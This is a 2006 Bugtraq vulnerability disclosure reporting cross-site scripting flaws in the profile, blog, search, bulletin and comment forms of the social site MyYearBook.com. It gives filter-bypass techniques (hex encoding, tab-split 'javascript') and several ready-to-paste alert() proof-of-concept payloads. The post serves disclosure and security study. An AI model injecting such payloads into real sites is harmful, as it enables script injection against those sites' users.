[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060525232125.9137.qmail@securityfocus.com>
Date: 25 May 2006 23:21:25 -0000
From: luny@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: MyYearBook.com - XSS
MyYearBook.com - Personal community site like myspace.com
Effected files:
Input forms of:
editing profile
posting a blog
search boxes
posting a bulletin
posting a comment
---------------------------
XSS Vulnerabilities proof of concept:
When editing your profile, it seems <script> tags are filtered to <notallowed> tags, and javascript is filtered to the word not allowed. To by pass this we can convert the script tags or the word javascript by using hex encoding. Below are following examples of places where user submitted data isn't properlly filtered before being dynamically generated.
Profile input:
All the user has to do is put the following in any input box in his profile: <IMG SRC=javascript:alert('XSS')>
Blog subject input:
<IMG SRC="jav	ascript:alert('XSS');">
Photo caption input:
Same as above.
<IMG SRC="jav	ascript:alert('XSS');">
Any search box input:
"><IMG SRC="jav	ascript:alert('XSS');"><"
Posting a bulletin input:
In the message input box the following works:
<IMG SRC=javascript:alert('XSS')>
Posting a comment:
<IMG SRC="jav ascript:alert('XSS');">
Make sure tab is enabled.
------------------------------------------------
Luny - http://www.youfucktard.com
Powered by blists - more mailing lists